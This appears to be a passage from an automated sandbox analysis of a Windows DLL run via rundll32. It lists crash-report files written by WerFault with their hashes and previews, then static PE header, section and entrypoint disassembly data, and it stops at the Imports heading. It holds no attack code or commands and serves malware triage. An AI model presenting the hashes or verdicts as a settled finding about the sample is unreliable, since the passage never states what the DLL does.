                                                                                                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.8.6.4.8.2.3.0.3.7.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.8.6.5.5.5.7.4.0.3.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.2.7.9.1.5.7.f.-.4.b.e.0.-.4.4.7.8.-.9.9.d.2.-.f.4.2.a.e.7.9.c.a.0.2.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.a.d.a.2.c.f.7.-.b.8.d.e.-.4.1.f.0.-.9.e.4.2.-.e.0.3.c.d.6.9.a.8.8.9.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.c.4.-.0.0.0.1.-.0.0.1.c.-.2.d.7.4.-.1.0.a.1.3.d.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER1549.tmp.WERInternalMetadata.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8406
                                                                                                                                Entropy (8bit):3.698743070989418
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Rrl7r3GLNi3jd6W6YVD96dgmf8NSMCprC89bnwUWsfStm:RrlsNiTd6W6YJ96dgmf8NSvnwU1fB
                                                                                                                                MD5:843C76288B5B86E920CBDAFDF7178B67
                                                                                                                                SHA1:014D8DDC43C2CFC67BBBF093D60C71A800068F55
                                                                                                                                SHA-256:C169356D757A52AEAEDA71E531886B3481BEA92953B9B11A01F7D5D07A934A5A
                                                                                                                                SHA-512:F168C58370610308E24B530BD778B881D87665AE5EC988219D2A89A03BAFACD53CB51268AD250FC8B24F67DADEEE2EBE855FDF3C62923FC6C6FD5EA3D0DF3378
                                                                                                                                Malicious:false
                                                                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.8.4.<./.P.i.d.>.......
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER18F4.tmp.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4771
                                                                                                                                Entropy (8bit):4.481204319652307
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwSD8zsPJgtWI9pFWSC8Bl78fm8M4JCdsPMFGD+q8vjsPKI4SrSxd:uITfxC0SNb4JdxKmdDWxd
                                                                                                                                MD5:B3096293B157544A11E07B9BC420DD68
                                                                                                                                SHA1:57259C5A2E808FD52947AE76E5F47FB0E56FF8B8
                                                                                                                                SHA-256:6ECFDFC49D3ED528BFC1B179F42DF660BAA7F19736D51855C79376AE6F4FE475
                                                                                                                                SHA-512:581BFB1D0B14C0309E3B64C3D8D1260118245471C7B67F9B3E932508193A3953ADF51D007157CC9D27797DACDEC1888B683B829AF1D3A97D6BB2D9D6F8C1F5CD
                                                                                                                                Malicious:false
                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206301" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER1DF3.tmp.dmp
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:50:56 2021, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):57848
                                                                                                                                Entropy (8bit):2.011654227292554
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:0eaydMcdJA1SL+3x+8nKyCPEAUXjxQk76EVEMRoQwv5jYMOnPTgD:80McbA1SL+3x+8nwPEftQiV8QwROTq
                                                                                                                                MD5:56D9C114464C0EAB37C5F1BA2CA25BD9
                                                                                                                                SHA1:CB86B8F90DE79CF655931CC1473376206F3AB4F1
                                                                                                                                SHA-256:7A50D18CA338C0603708D0AAE04ACE11D6AFAABB62E18955544488A0789FD2C1
                                                                                                                                SHA-512:F726BEEBEFD4EEC6630471826DADF2A8000272FEC02C2B037B14F4B6291A3AF158C86D9A22FE99B6D38133BA26352717A19333FEBF3ED66C3F23034190571238
                                                                                                                                Malicious:false
                                                                                                                                Preview: MDMP....... .......`>ea...................U...........B..............GenuineIntelW...........T.......|....=ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2A87.tmp.WERInternalMetadata.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8302
                                                                                                                                Entropy (8bit):3.694733762852044
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Rrl7r3GLNiYjA6yj6YVx6dgmfTkOSiCpDp89bRRsf8U7m:RrlsNiSA6Q6Yj6dgmfTkOS0RKf8
                                                                                                                                MD5:AF2F6F97AC027E2DE27FA9E9412E71C6
                                                                                                                                SHA1:F7A825A5D6E3D83D7F5DD819370635A22A337A12
                                                                                                                                SHA-256:EC4A2E76921EE09528478069C9C4AFD67F13B7D091456816762F9754E888BBC4
                                                                                                                                SHA-512:C51ABDEC5497BBC13BFE4C4561DB25FE8D0CC7F0EA242C52FE4EEF90D13B26F4B77DB4710F99B1679ACC20428771F47D94494644DF55F99CB2FBDBA4102D58F9
                                                                                                                                Malicious:false
                                                                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.0.1.2.<./.P.i.d.>.......
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2AA5.tmp.dmp
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:51:00 2021, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):35284
                                                                                                                                Entropy (8bit):2.385701210745147
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:QhtbBKt5jXjMzQ1IDZqyqU10+hesUgks4TUhegfXPO+:cBKDrQzQaqyNhe7gATUD/V
                                                                                                                                MD5:26D47BBB77204AEDD136BCC1854DA26A
                                                                                                                                SHA1:CA3F25C975A62C71298F927C5636EB23E6E7D066
                                                                                                                                SHA-256:594A65A664C3A120943D2C24EF892E6C7E3C72FD169628A57A4039B4714593F7
                                                                                                                                SHA-512:F58931527BA57F956163D14848BF67B1E0876609C0144226A74316058E70503F6331BABC6161AB40994338E3D0B6CD212D5944ABACACCB87D5C03D6C38D2698C
                                                                                                                                Malicious:false
                                                                                                                                Preview: MDMP....... .......d>ea...................U...........B..............GenuineIntelW...........T............=ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2F6A.tmp.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4630
                                                                                                                                Entropy (8bit):4.4533004304049015
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwSD8zsPJgtWI9pFWSC8BV8fm8M4JCds9FhF9I+q8/5WY4SrS1d:uITfxC0SNAJ3kHYDW1d
                                                                                                                                MD5:361E1FB3A3A1D969F46C202D9F6A6BE9
                                                                                                                                SHA1:2CB93394875E4A71BFB33DA586C42FB25F9FA40D
                                                                                                                                SHA-256:41E6D6A75CCF51226DE7B4D0C8015FD4D2D4DA5CC95EF56E60F411B8CE2834C4
                                                                                                                                SHA-512:8708A1C8FE3F89B87370FAE532A4877E25F4B43661C491A6A89F94843EC94E772CC730730213F40C9B6021FB88E55DA7BBC66D985609959E4760DEDBDAD17448
                                                                                                                                Malicious:false
                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206301" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E5D.tmp.WERInternalMetadata.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):8406
                                                                                                                                Entropy (8bit):3.699426610909095
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Rrl7r3GLNiEjt6EJ6YV/6dgmf8NSMCprs89bxKsf6bm:RrlsNi+t6EJ6Yt6dgmf8NStxpfv
                                                                                                                                MD5:C68EE9F1E9CC2120F276F341A19B2ADC
                                                                                                                                SHA1:C356502CDA05C48684274ACDC1EF601B7C0BCB42
                                                                                                                                SHA-256:8E92D82339769DC546E938521D48F02B2295CCC867E96DA3A0C9B9802662DFE8
                                                                                                                                SHA-512:82A56DCB8302FB319A22119AD036E6DF508C00722338CDB6AC58F8ADC26966836AA6D7F2EFF9BD9E724D035423923155E8191EC36656859655A0B2B16A89CA36
                                                                                                                                Malicious:false
                                                                                                                                Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.3.6.0.<./.P.i.d.>.......
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER49E7.tmp.xml
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):4771
                                                                                                                                Entropy (8bit):4.482639623381592
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:cvIwSD8zsPJgtWI9pFWSC8Bq8fm8M4JCdsPMFP+q8vjsPu4SrSchd:uITfxC0SNNJdmKmuDW4d
                                                                                                                                MD5:4907E384041C5C9D778C701F72E97A31
                                                                                                                                SHA1:70EC43A7F6AAC60CC85361597425778220A4B820
                                                                                                                                SHA-256:6EA365475E9D5B0E05E821C2FF98D74B4F13311B4C9BF2CBA7FEFA13C8D3BE0B
                                                                                                                                SHA-512:417778634689D92CA355958B0791321F83CD9672E3A0CE8F07DB83A6E7EA2FA69AF2CD76D51DC38FD46924132E9F17FC24CB10A54E93F2C023055C31EB70F39B
                                                                                                                                Malicious:false
                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206301" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER923.tmp.dmp
                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:50:51 2021, 0x1205a4 type
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):35708
                                                                                                                                Entropy (8bit):2.3486234062735507
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:Ppoob1NtADw07S8VXjMzQ1IDZqcqa15q+TlYzGEfShfTHHcR:BoobxfR8VQzQaqcJq+JYzGEMTHk
                                                                                                                                MD5:AB79F102EB23B8810370F156BF99C2F3
                                                                                                                                SHA1:AB6185126C490366EA9A2DB1356D419BBF92B2D9
                                                                                                                                SHA-256:DF08B5455FE3079A4AFFE403CE6D1CD2E809784433C83BC1565BDB6835CA7C0E
                                                                                                                                SHA-512:CBDE020EB79704CB9008A597BB27102DD4393583CE542ECB48B1664A9864321A994FDB4F973018FDDE12CEF573274DA211256A37DEB0D755A093865DBCCCFBC8
                                                                                                                                Malicious:false
                                                                                                                                Preview: MDMP....... .......[>ea...................U...........B..............GenuineIntelW...........T............=ea.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):6.669952151971332
                                                                                                                                TrID:
                                                                                                                                • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.20%
                                                                                                                                • DOS Executable Generic (2002/1) 0.20%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:616412739e268.dll
                                                                                                                                File size:718336
                                                                                                                                MD5:9e67e68ddbedba865b91b5469ab642ef
                                                                                                                                SHA1:f2c7b0735343081be06e48616d0fc14235a28744
                                                                                                                                SHA256:41c0934ba1be030dbae45893107f6a2ae5f99c79d7634626263cdf809f7556ee
                                                                                                                                SHA512:802d983ca7ca04ae737da69ed5772eece8f408c6c02c8d0c42cfea1c1abf25236b02c35c09d56f3ba6a229b3b71f72fa3d4c6735c8670c76affdbbc139b63d87
                                                                                                                                SSDEEP:12288:aUAQSxl6fDEr8Np6b/rPPsjosrS9aEoe+0JCym+4YJAOSVUNcuHIGF4uW/XrGAsV:az3xl6fq8Np6bTPPaBreaZlYCOSVol2a
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m$aV.J2V.J2V.J2...2U.J2_t.2H.J2.cH3R.J2.cO3_.J2.cI3D.J2...2H.J2V.K2..J2.cO3).J2.cJ3W.J2.cJ3W.J2V..2W.J2.cH3W.J2RichV.J2.......

                                                                                                                                File Icon

                                                                                                                                Icon Hash:74f0e4ecccdce0e4

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x1003ab77
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x10000000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                                                                                                                Time Stamp:0x5F700BB2 [Sun Sep 27 03:49:06 2020 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:6
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:6
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:6
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:b5c6badd398e2e3aa283a40a40432c6c

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                cmp dword ptr [ebp+0Ch], 01h
                                                                                                                                jne 00007F018CD7E347h
                                                                                                                                call 00007F018CD7EE32h
                                                                                                                                push dword ptr [ebp+10h]
                                                                                                                                push dword ptr [ebp+0Ch]
                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                call 00007F018CD7E1EAh
                                                                                                                                add esp, 0Ch
                                                                                                                                pop ebp
                                                                                                                                retn 000Ch
                                                                                                                                mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                mov dword ptr fs:[00000000h], ecx
                                                                                                                                pop ecx
                                                                                                                                pop edi
                                                                                                                                pop edi
                                                                                                                                pop esi
                                                                                                                                pop ebx
                                                                                                                                mov esp, ebp
                                                                                                                                pop ebp
                                                                                                                                push ecx
                                                                                                                                ret
                                                                                                                                mov ecx, dword ptr [ebp-10h]
                                                                                                                                xor ecx, ebp
                                                                                                                                call 00007F018CD7DF43h
                                                                                                                                jmp 00007F018CD7E320h
                                                                                                                                mov ecx, dword ptr [ebp-14h]
                                                                                                                                xor ecx, ebp
                                                                                                                                call 00007F018CD7DF32h
                                                                                                                                jmp 00007F018CD7E30Fh
                                                                                                                                push eax
                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                lea eax, dword ptr [esp+0Ch]
                                                                                                                                sub esp, dword ptr [esp+0Ch]
                                                                                                                                push ebx
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                mov dword ptr [eax], ebp
                                                                                                                                mov ebp, eax
                                                                                                                                mov eax, dword ptr [100AA0D4h]
                                                                                                                                xor eax, ebp
                                                                                                                                push eax
                                                                                                                                push dword ptr [ebp-04h]
                                                                                                                                mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                                mov dword ptr fs:[00000000h], eax
                                                                                                                                ret
                                                                                                                                push eax
                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                lea eax, dword ptr [esp+0Ch]
                                                                                                                                sub esp, dword ptr [esp+0Ch]
                                                                                                                                push ebx
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                mov dword ptr [eax], ebp
                                                                                                                                mov ebp, eax
                                                                                                                                mov eax, dword ptr [100AA0D4h]
                                                                                                                                xor eax, ebp
                                                                                                                                push eax
                                                                                                                                mov dword ptr [ebp-10h], eax
                                                                                                                                push dword ptr [ebp-04h]
                                                                                                                                mov dword ptr [ebp-04h], FFFFFFFFh
                                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                                mov dword ptr fs:[00000000h], eax
                                                                                                                                ret
                                                                                                                                push eax
                                                                                                                                inc dword ptr fs:[eax]

                                                                                                                                Data Directories

                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0xa89900x80.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0xa8a100x50.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x1460000x53d0.reloc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xa474c0x54.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa47a00x40.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x7b0000x1fc.rdata
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                Sections

                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                .text0x10000x79f710x7a000False0.510071801358data6.75463290974IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                .rdata0x7b0000x2e5860x2e600False0.556366871631data5.60181106954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                .data0xaa0000x9b19c0x1800False0.190266927083data4.15778005426IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                .reloc0x1460000x53d00x5400False0.752650669643data6.72453697464IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                Imports

                                                                                                                                DLLImport
